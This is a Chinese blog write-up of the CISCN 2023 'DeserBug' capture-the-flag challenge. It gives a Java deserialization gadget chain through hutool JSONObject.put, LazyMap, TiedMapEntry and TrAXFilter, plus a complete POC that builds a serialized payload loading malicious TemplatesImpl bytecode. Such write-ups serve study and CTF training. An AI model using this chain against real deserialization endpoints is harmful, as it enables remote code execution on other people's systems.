[CISCN 2023]—DeserBug

已于 2023-05-30 20:07:51 修改
阅读量865 收藏 1
点赞数
文章标签: c# java json
于 2023-05-30 20:05:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54902210/article/details/130956079
版权

DeserBug

  • 题目描述:

    • cn.hutool.json.JSONObject.put->com.app.Myexpect#getAnyexcept

  • 附件

    • 链接:https://pan.baidu.com/s/1lVABZUxmdEmXHL092P-efA?pwd=up9t

题目分析

题目中有两个类:Testapp、Myexpect

Testapp

本地8888端口开启服务,获取bugstr传参内容并进行反序列化

在这里插入图片描述

根据依赖会想到CC反序列化,但题中给到的是CC3.2.2版本,CC自3.2.1后新添加了checkUnsafeSerialization功能对反序列化内容进行检测,而CC链常用到的InvokerTransformer就列入了黑名单中,不过题目给出了另一个类Myexpect

Myexpect

其中getAnyexcept定义了newInstance(),能够实例化一个单参数类

在这里插入图片描述

结合newInstance可以联想到TrAXFilter,借此实现Templates动态加载恶意字节码
在这里插入图片描述

getAnyexcept

接下来就是要找哪里调用了getAnyexcept,根据提示从cn.hutool.json.JSONObject.put查找

cn.hutool.json.JSONObject.put->com.app.Myexpect#getAnyexcept

经过一级级调用发现在PropDesc#getValue(),经过反射调用bean的getter方法

在这里插入图片描述

调用栈

getValue:154, PropDesc (cn.hutool.core.bean)
lambda$copy$0:66, BeanToMapCopier (cn.hutool.core.bean.copier)
accept:-1, 846238611 (cn.hutool.core.bean.copier.BeanToMapCopier$$Lambda$13)
forEach:684, LinkedHashMap (java.util)
copy:48, BeanToMapCopier (cn.hutool.core.bean.copier)
copy:16, BeanToMapCopier (cn.hutool.core.bean.copier)
copy:92, BeanCopier (cn.hutool.core.bean.copier)
beanToMap:713, BeanUtil (cn.hutool.core.bean)
mapFromBean:264, ObjectMapper (cn.hutool.json)
map:114, ObjectMapper (cn.hutool.json)
<init>:210, JSONObject (cn.hutool.json)
<init>:187, JSONObject (cn.hutool.json)
wrap:805, JSONUtil (cn.hutool.json)
set:393, JSONObject (cn.hutool.json)
set:352, JSONObject (cn.hutool.json)
put:340, JSONObject (cn.hutool.json)
put:32, JSONObject (cn.hutool.json)

put

接着就要看哪里调用了put,这里直接结合CC6的前半段即可

put:32, JSONObject (cn.hutool.json)
get:159, LazyMap (org.apache.commons.collections.map)
getValue:74, TiedMapEntry (org.apache.commons.collections.keyvalue)
hashCode:121, TiedMapEntry (org.apache.commons.collections.keyvalue)
hash:339, HashMap (java.util)
readObject:1413, HashMap (java.util)

POC

import cn.hutool.json.JSONObject;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import javax.xml.transform.Templates;
import java.util.Base64;
import java.util.HashMap;
import java.util.Map;

import static com.app.Tools.getBytes;
import static com.app.Tools.setFieldValue;
import static com.app.Tools.*;

public class POC {
    public static void main(String[] args) throws Exception {
        byte[] bytes = getBytes("Evil");
        TemplatesImpl templates = new TemplatesImpl();
        setFieldValue(templates, "_name", "Sentiment");
        setFieldValue(templates, "_class", null);
        setFieldValue(templates, "_bytecodes", new byte[][]{bytes});

        Myexpect myexpect = new Myexpect();
        myexpect.setTargetclass(TrAXFilter.class);
        myexpect.setTypeparam(new Class[]{Templates.class});
        myexpect.setTypearg(new Object[]{templates});

        JSONObject jsonObject = new JSONObject();

        ConstantTransformer transformer = new ConstantTransformer(1);
        Map outerMap  = LazyMap.decorate(jsonObject,transformer);
        TiedMapEntry tiedMapEntry = new TiedMapEntry(outerMap , "Sentiment");

        HashMap hashMap = new HashMap();
        hashMap.put(tiedMapEntry, "1");

        jsonObject.remove("Sentiment");
        setFieldValue(transformer,"iConstant",myexpect);

        byte[] serialize = serialize(hashMap);
        System.out.println(Base64.getEncoder().encodeToString(serialize));
        //unserialize(serialize);
    }
}
S1nJa
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
2023全国大学生信息安全竞赛(ciscn)初赛题解
返璞归真的博客
05-28 1万+
2023全国大学生信息安全竞赛(ciscn)部分题解
ciscn-2019-pwn
11-29
【标题】"ciscn-2019-pwn"是一个与网络安全竞赛相关的主题,尤其聚焦于"Pwn"类别,这通常指的是破解或利用程序漏洞来获取系统控制权的挑战。2019年的CISCN(中国互联网安全大会)可能是这个挑战的背景,它是一个汇集...
【Web】记录CISCN2023国赛初赛DeserBug题目复现
uuzeray的博客
03-15 1437
Hessian的链子审得有点疲劳,不如做做题吧,挑了国赛入手,整体做下来感觉十分丝滑&水到渠成,自然&通透。仅仅是记录一下菜鸡做题的感受,不会往深入了讲当时好像题目是不出网的,但我们就按出网的情况来做直接反弹shell,删繁就简。这题主要是要有两个思维敏感度,刚好就是提示的一头一尾cn.hutool.json.JSONObject.put:CC5/CC6调map.put的常规手法。
ciscn2023华北赛区
……
06-29 904
利用点在这里的os.system函数。这里的savepath是我们可控的,通过修改文件名就可以控制savepath的值,所以在os.system函数中拼接系统命令,本地运行进行调试。看到在本地是执行了命令的,但是页面上没有回显,考虑弹shell,因为不允许一些符号使用,所以用base64编码一下。利用不同类型a=1和b='1’绕过强等判断。这里通过’'符号来绕过,/f\l\a\g。这里禁止了通过数组绕过md5的方法。反序列化触发wakeup函数。payload拿到原题。
2023CISCN—华中赛区—pwn wp
m0_63437215的博客
07-13 1207
ciscn2023华中赛区pwn
2023CISCN部分wp
qq_51862722的博客
05-29 764
2023ciscn部分wp
ciscn介绍及参会准备事项.zip
05-19
**CISCN介绍** CISCN,全称为“中国互联网安全大会”(China Internet Security Conference and Network),是中国网络安全领域的一项重要年度盛会。该会议由国内知名的安全组织、企业和专家学者共同发起,旨在搭建...
CISCN_frontend
04-17
前端界面展示(待定)项目模板来源安装:nodejs环境python3环境根目录下执行npm installpip install werkzeug flask flask_cors我这里用了伪后端(为了开发方便,后期融合到django中,到时候再进行更改),伪后端...
Double ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
【标题】"Double ciscn 2019 第十二届全国大学生信息安全竞赛"揭示了这是一个信息安全领域的竞赛,特别是针对大学生的。"全国大学生信息安全竞赛"是中国一项具有高影响力的年度赛事,旨在提升大学生的信息安全技能,...
ciscn_2021_game
06-23
2021年国赛的pwn题,虚拟机类型的题目,分析起来比较有难度。
your_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
pwn赛题之your_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
ciscn的具体介绍.doc
05-19
ciscn 全国大学生信息安全竞赛(CISCN)的具体介绍 一、竞赛背景与意义 全国大学生信息安全竞赛(CISCN)是由教育部高等教育司和工信部信息安全协调司指导,由信息安全教指委主办的全国大学生公益性科技活动。自...
ciscn_2019_n_3
12-30
ciscn(全国大学生信息安全竞赛),2019年的一道题目,涉及到fastbin堆漏洞的利用。由于调用了system函数,所以漏洞利用的难度不大,推荐初学者练习。题解链接:...
ciscn国赛分站赛命题模板
最新发布
05-19
【标题】:“ciscn国赛分站赛命题模板”是指中国网络安全技术对抗赛(China Internet Security Competition,简称CISCN)的分站赛事中所使用的命题格式和规范。这个标题提示我们,这是一个关于网络安全竞赛的指导性...
baby_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
【标题】"baby_pwn ciscn 2019 第十二届全国大学生信息安全竞赛" 涉及的是一个信息安全竞赛中的题目,该比赛可能是针对参赛者在网络安全领域,特别是"pwn"类问题解决能力的挑战。"pwn"在黑客术语中通常指的是攻破或...
2023CISCN初赛
这个人很懒,什么都懒得写
06-04 970
随便写写
[CISCN 2023 初赛]moveAside
weixin_52118017的博客
06-01 382
发现大抵是亦或,可根据uuid和flag头恢复2个key。ida反编译后定位查看字符串。今年国赛的一题,记录一下。将这个数组提取出来。
Ciscn_2021_lonelywolf
红叶的博客
03-18 188
在第一步中我们得到了tcache_struct的起始地址,我们只需要+0x10即可得到tcache_struct的数据段地址,因为tcache_struct本身也是一个堆。这里有一点需要注意,本题的libc是新版的2.27,具有检测Double Free的机制。机制是在tcache堆中的bk上存储了一段数据,称为key,如果检测到了key,即检测到Double Free。可以发现系统从0x55dc90f61000开辟了0x80,成了我们申请的堆块,变成了0x55dc90f61080,并且状态也改变了。
[2023CISCN]国赛初赛WEB题目复现
qq_42585535的博客
10-23 547
最近几个月在学免杀,JAVA安全以及JS相关内容,导致CTF摆了很久,这次复现国赛题目就当做恢复训练了。
OSError: [WinError 123] 文件名、目录名或卷标语法不正确。: 'D:\\[CISCN 2023 初赛]\\img_5e1b8d1b1db258f45d1059dbafc10f11\tmp4'
05-29
这个错误提示是在Windows系统下发生的,意思是文件名、目录名或卷标语法不正确。具体而言,是在路径名中有不合法的字符或格式。 根据错误提示信息,路径是'D:\\[CISCN 2023 初赛]\\img_5e1b8d1b1db258f45d1059dbafc10f11\tmp4',可以看出可能是路径名中包含了中括号"[]"这样的特殊字符,而这些字符在Windows系统中是不允许出现在路径名中的。因此,需要修改路径名中的这些特殊字符,或者将文件复制到不包含这些特殊字符的路径下。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值